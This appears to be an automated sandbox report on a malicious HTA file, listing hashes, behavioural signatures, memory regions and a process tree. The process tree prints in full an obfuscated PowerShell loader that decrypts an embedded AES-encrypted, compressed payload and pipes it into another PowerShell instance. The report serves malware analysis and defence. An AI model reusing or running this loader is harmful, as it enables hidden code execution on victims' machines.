Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23/02/2024, 07:04

General

  • Target

    qxhbj.hta

  • Size

    74KB

  • MD5

    b6079dca9dd507c2cd9e5d988edf3822

  • SHA1

    263585b64c4f8d60293764053aa6cb90673dc999

  • SHA256

    4551133648c40891ae3153c93c96f6fdd8c23b9c4fd3a0cb61a5092da2f38f41

  • SHA512

    a0387c9e2374998960f87cc1c415fa29465c04c5afd06023f82a0b81483805951512111acadaa54a6af79502d467171f922ef694fd71cf45995ecba5370f60cb

  • SSDEEP

    768:Il/RkkYVb3FT8kQ7M+HO0r8aul0UchiMk0sS7:GukYVbd8ke3uC5ulAZuS7

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\qxhbj.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $fZSRGpe = 'AAAAAAAAAAAAAAAAAAAAANe8iT6aUdWnM9cxbq5YpLTsUt3/KlEeLn2U+/ec/zbmIgP8b7r79bvA0eFBN2R5WIMVa8tg04mq8S3KQz9bxkeJ1MF2CNCV4TUmuKgtK4GuTDoZNIdN1yHi0KmulMM+Mj1vEOpnWpSxJV3NI95kAMuyAv0tZqsdcA9TriOVw8uSoGuTKMAvZafG0D4G2NKrrukOSclLQxud2ZgA302sN6wlaXsdbYXXbFNVlB4LSqK/t5ytYmwR+8HmLt5Uu1xtTlA11PAJR86Veo9t7lTYBl5q7hQvusWiezMEIl+hNKgJZ9xapkoj9rxsHwaxSdLhM1hxa3aspjB0tBwrcI5ddDaIZB1Yged9d0bAkM9ke2a+90eXhdIfXWlyCsBBQoC9TYDPQ5086LN3Ai1YHkrX4dta5TD9hD8mjV+zfor8c4CpIK+Mzz15IPkk7nTsN+x/QVPHQbssz50B6lnBKAMncfU9qlYqEOIh55Qs6pLP7/CoLKB1zBnSysAE2aKUwhPJtTBzTruFB7IZu5lvxp9eDwP4g8co2sLAfn9uLVIr6mXVs/FadscZCBRHlTjRMvwn23WQcIyxnix+0anud0h/nL5sYkPt8ApDuJs75tM/hL9D7sZKZleAJtypCgCd/tQ/Np21x16j9sRLR5uU0V7P1wXGvxlZWoBqTB7ElfMQ1gP/hMj4tEJL4GDxJjJst7FdX2wXL8YD8bPlaiIOQDyuauj6sWRwtTuJG4oKjbTlKTqG6UVP7KKQt1W0JY91SnkH4zI1yXY78p5q02vldgB7gbN4Gr8mdbs75elM4+JC5SzcVmvib5kRJ0z4XAhLc/fVK6F2Xsry01hJXZ4l2bmcV8yGml2/ZW03oNLtHV3f2n9bbo0Vf77cmPkHnf4zSB9iIZY74EVhqmsDcrft1c2Ir+S00lHT8oFmf9QZyVYEa58YmjId+17rtHm7cyQ2QBpQMP71S54OEV5VEUf6Q8K/eE5vp3ObTvDVP0GbBF27TNmo09HCBPqbfLKgH9ONAemoeQgRO5aiwZhbEcpyzjaEJM7yOWKJi/Jev1kbbmN5x29LJHIBnq8inXyFa8cALUG2xHqyYtKgl1ZHxBo8ZLrL+RXBtKOja5Nyj9o6D2mipACg0K0mL8T5uWJsmAgY+Sc/wZv+N+2XMvC5tei9uGal5wnbRVeaY2wUHipCdT546YihLEjkKLg1gkH8rZkIX4IoUA==';$fRNnXP = 'c3BWRnJZZE10Z3JVbG5ySWpqZ09QWFVLd2FzckhiblU=';$dmIEqwzR = New-Object 'System.Security.Cryptography.AesManaged';$dmIEqwzR.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dmIEqwzR.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dmIEqwzR.BlockSize = 128;$dmIEqwzR.KeySize = 256;$dmIEqwzR.Key = [System.Convert]::FromBase64String($fRNnXP);$LmEgn = [System.Convert]::FromBase64String($fZSRGpe);$dBvbIHmm = $LmEgn[0..15];$dmIEqwzR.IV = $dBvbIHmm;$jxZcIjVXh = $dmIEqwzR.CreateDecryptor();$wekAqpkqE = $jxZcIjVXh.TransformFinalBlock($LmEgn, 16, $LmEgn.Length - 16);$dmIEqwzR.Dispose();$XWqxhr = New-Object System.IO.MemoryStream( , $wekAqpkqE );$shQNvH = New-Object System.IO.MemoryStream;$XXlHwHgWC = New-Object System.IO.Compression.GzipStream $XWqxhr, ([IO.Compression.CompressionMode]::Decompress);$XXlHwHgWC.CopyTo( $shQNvH );$XXlHwHgWC.Close();$XWqxhr.Close();[byte[]] $uQlWtSPQ = $shQNvH.ToArray();$mLKlE = [System.Text.Encoding]::UTF8.GetString($uQlWtSPQ);$mLKlE | powershell -
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2656

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    4011b14119173ff74c8718f7fa0a9ce6

    SHA1

    c0c09f0ceaa5e4e1a76d7e268e97a8c781f9184b

    SHA256

    1af34e55da8c8653a1fe86e678e33acbaf261b0b61e263b4880d9bc57893471c

    SHA512

    969bfd6904f7d15e2de47292dad6fac0dfb455710961b2cc99bf928be4b8d850f69fae80fb2c55aad5804a3c7dc2da88f66cb5fc3e59778bbda91b07d7ea5ec7

  • memory/2656-10-0x00000000721B0000-0x000000007275B000-memory.dmp

    Filesize

    5.7MB

  • memory/2656-11-0x00000000721B0000-0x000000007275B000-memory.dmp

    Filesize

    5.7MB

  • memory/2656-12-0x0000000002820000-0x0000000002860000-memory.dmp

    Filesize

    256KB

  • memory/2656-13-0x0000000002820000-0x0000000002860000-memory.dmp

    Filesize

    256KB

  • memory/2656-14-0x0000000002820000-0x0000000002860000-memory.dmp

    Filesize

    256KB

  • memory/2656-15-0x00000000721B0000-0x000000007275B000-memory.dmp

    Filesize

    5.7MB

  • memory/2932-2-0x00000000721B0000-0x000000007275B000-memory.dmp

    Filesize

    5.7MB

  • memory/2932-3-0x00000000721B0000-0x000000007275B000-memory.dmp

    Filesize

    5.7MB

  • memory/2932-4-0x0000000002620000-0x0000000002660000-memory.dmp

    Filesize

    256KB

  • memory/2932-16-0x00000000721B0000-0x000000007275B000-memory.dmp

    Filesize

    5.7MB